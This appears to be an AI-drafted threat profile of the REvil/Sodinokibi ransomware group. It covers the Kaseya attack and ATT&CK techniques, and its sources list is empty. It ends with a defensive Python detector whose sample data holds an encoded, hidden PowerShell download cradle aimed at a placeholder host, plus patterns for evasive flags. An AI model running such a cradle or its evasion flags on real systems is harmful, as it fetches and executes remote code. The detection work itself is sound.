AI Draft UNKNOWN

REvil / Sodinokibi

Also known as: REvil, Sodinokibi, GOLD SOUTHFIELD, Pinchy Spider
Affiliation: Cybercriminal
Motivation: Financial / Ransomware Extortion
Status: Unknown
Country: Unknown
Last Seen: 2021

Executive Summary

REvil, also known as Sodinokibi, is a ransomware-as-a-service and extortion operation tracked by MITRE ATT&CK as GOLD SOUTHFIELD. MITRE describes GOLD SOUTHFIELD as a financially motivated threat group that operates REvil ransomware-as-a-service and provides backend infrastructure for affiliates recruited on underground forums.

The operation is associated with ransomware deployment, data-theft extortion, and affiliate-driven intrusions. DOJ and FBI public records identify Sodinokibi/REvil affiliates and alleged operators by name, including the charges and seizure actions announced in November 2021. Those records support cybercriminal attribution; they do not establish state sponsorship of the operation.

Notable Campaigns

The July 2021 Kaseya VSA supply-chain incident is the principal campaign documented in the cited public sources. CISA's alert "Kaseya VSA Supply-Chain Ransomware Attack" stated that CISA was responding to a supply-chain ransomware attack against Kaseya VSA and against multiple managed service providers that use the VSA software. CISA urged affected organizations to follow Kaseya's guidance and shut down their VSA servers, so that an exposed VSA instance could not be used as the distribution point for the ransomware.

The DOJ press release "Ukrainian Arrested and Charged with Ransomware Attack on Kaseya" later announced charges against Yaroslav Vasinskyi for alleged ransomware attacks, including the July 2021 Kaseya attack. DOJ stated that the Kaseya attack involved malicious Sodinokibi/REvil code deployed through a Kaseya product to endpoints on customer networks.

Technical Capabilities

MITRE ATT&CK reports that GOLD SOUTHFIELD used multiple initial-access paths: exploitation of public-facing applications, malicious spam, external remote services, managed service provider relationships, and software supply-chain compromise. MITRE also reports that the group used ConnectWise Control to deploy REvil and staged and executed PowerShell scripts on compromised hosts. The practical consequence for defenders is that the same post-access tooling (a legitimate remote-access agent followed by PowerShell) shows up regardless of which initial-access path was used.

DOJ described Sodinokibi/REvil deployments in which the defendants allegedly accessed victim networks, deployed the ransomware, encrypted victim computers, and left ransom notes directing victims to Tor or other web addresses for payment instructions. DOJ and FBI sources also describe the data-theft pressure used alongside encryption: if a victim did not pay, stolen data could be posted publicly or claimed to have been sold.

Attribution

Public sources support attribution to a financially motivated cybercriminal ransomware ecosystem rather than to a single actor. MITRE tracks the associated group as GOLD SOUTHFIELD and lists Pinchy Spider as an associated public name. The FBI described Yevgeniy Igorevich Polyanin as one of many Sodinokibi/REvil ransomware affiliates and stated that he is believed to be in Russia, possibly Barnaul.

DOJ and FBI records identify named individuals as alleged affiliates or operators in specific cases. The cited public sources do not establish that the entire REvil/Sodinokibi operation was directed by a state intelligence service.

MITRE ATT&CK Profile

T1190 - Exploit Public-Facing Application: MITRE reports GOLD SOUTHFIELD exploitation of public-facing applications, including Oracle WebLogic vulnerabilities, for initial compromise.

T1195.002 - Compromise Software Supply Chain: MITRE reports GOLD SOUTHFIELD distribution of ransomware through compromised software supply-chain paths.

T1199 - Trusted Relationship: MITRE reports GOLD SOUTHFIELD compromise of managed service providers to deliver malware to downstream customers.

T1219 - Remote Access Tools: MITRE reports GOLD SOUTHFIELD use of ConnectWise Control to deploy REvil.

T1059.001 - PowerShell: MITRE reports GOLD SOUTHFIELD staging and execution of PowerShell scripts on compromised hosts.

T1486 - Data Encrypted for Impact: DOJ described Sodinokibi/REvil ransomware deployments that encrypted victim computers.
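The T1219 and T1059.001 entries above describe a host-level pattern that is cheap to hunt for: a remote-access agent spawning PowerShell, and PowerShell launched with an encoded or policy-bypassing command line. The following is an added example written for this profile, not code from MITRE, DOJ, CISA or the REvil operators. It runs a small detector over constructed process-creation records in a Sysmon-event-ID-1-like shape and tags each hit with the ATT&CK technique it matches. The ConnectWise Control (ScreenConnect) client binary names, the flag patterns, and all sample records are assumptions made for illustration; tune the parent-process list to the remote-access tools actually deployed in your environment.

```python
"""
Added example (not from the original profile or from MITRE/DOJ/CISA material):
hunt process-creation records for the T1219 + T1059.001 pattern the profile maps
to GOLD SOUTHFIELD. Process names, flags and sample records are constructed
assumptions for illustration only.
"""
import base64
import re
from dataclasses import dataclass, field
from typing import Iterable, List, Optional

# Assumption: binary names the ConnectWise Control (ScreenConnect) client runs
# as on Windows. Extend with any other remote-access tool used in your estate.
REMOTE_ACCESS_PARENTS = {
    "screenconnect.clientservice.exe",
    "screenconnect.windowsclient.exe",
}
POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe"}

# -EncodedCommand and its abbreviations, followed by a base64 blob.
ENCODED_FLAG = re.compile(
    r"(?i)(?:^|\s)-(?:encodedcommand|enc|en|ec|e)\s+([A-Za-z0-9+/=]{8,})"
)
# Flags commonly paired with staged scripts: policy bypass, hidden window, no profile.
EVASION_FLAGS = re.compile(
    r"(?i)-(?:ep|ex|executionpolicy)\s+bypass|-(?:w|windowstyle)\s+hidden|-(?:nop|noprofile)\b"
)


@dataclass
class Finding:
    record_id: str
    techniques: List[str] = field(default_factory=list)
    reasons: List[str] = field(default_factory=list)
    decoded_command: Optional[str] = None


def basename(path: str) -> str:
    """Case-folded file name from a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Recover the script behind -EncodedCommand (base64 of UTF-16LE text)."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze(record: dict) -> Optional[Finding]:
    """Map one process-creation record to ATT&CK techniques, or None if benign."""
    image = basename(record.get("Image", ""))
    parent = basename(record.get("ParentImage", ""))
    cmdline = record.get("CommandLine", "")
    f = Finding(record_id=str(record.get("RecordId", "?")))

    if parent in REMOTE_ACCESS_PARENTS:
        f.techniques.append("T1219")
        f.reasons.append(f"child process of remote-access tool {parent}")

    if image in POWERSHELL_IMAGES:
        f.decoded_command = decode_encoded_command(cmdline)
        if f.decoded_command is not None:
            f.reasons.append("encoded PowerShell command line")
        if EVASION_FLAGS.search(cmdline):
            f.reasons.append("execution-policy bypass, hidden window or no-profile flag")
        # Interactive PowerShell from a user shell is normal; attribute T1059.001
        # only when a suspicious parent or flag is present.
        if f.reasons:
            f.techniques.append("T1059.001")

    return f if f.reasons else None


def scan(records: Iterable[dict]) -> List[Finding]:
    return [f for f in map(analyze, records) if f is not None]


def encode_powershell(script: str) -> str:
    """Produce the base64 form PowerShell expects after -EncodedCommand."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample records; none are real telemetry.
STAGED_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/s.ps1')"
SAMPLE_RECORDS = [
    {"RecordId": 1, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -NoLogo"},
    {"RecordId": 2, "ParentImage": r"C:\Program Files (x86)\ScreenConnect Client\ScreenConnect.ClientService.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": f"powershell.exe -nop -w hidden -ep bypass -enc {encode_powershell(STAGED_SCRIPT)}"},
    {"RecordId": 3, "ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -ExecutionPolicy Bypass -File C:\Users\Public\stage.ps1"},
    {"RecordId": 4, "ParentImage": r"C:\Program Files (x86)\ScreenConnect Client\ScreenConnect.ClientService.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c whoami"},
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_RECORDS):
        print(finding)
```

Record 1 (PowerShell started interactively from Explorer) produces no finding, which is the point of gating T1059.001 on a suspicious parent or flag: a rule that fires on every powershell.exe launch is unusable in a fleet. Record 2 is the full pattern from the profile (remote-access agent, hidden window, policy bypass, encoded download cradle) and the decoded script is attached to the finding so an analyst sees the staged command rather than a base64 blob. Record 4 shows that any child of the remote-access agent is still worth a T1219 tag even when it is not PowerShell.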

Sources & References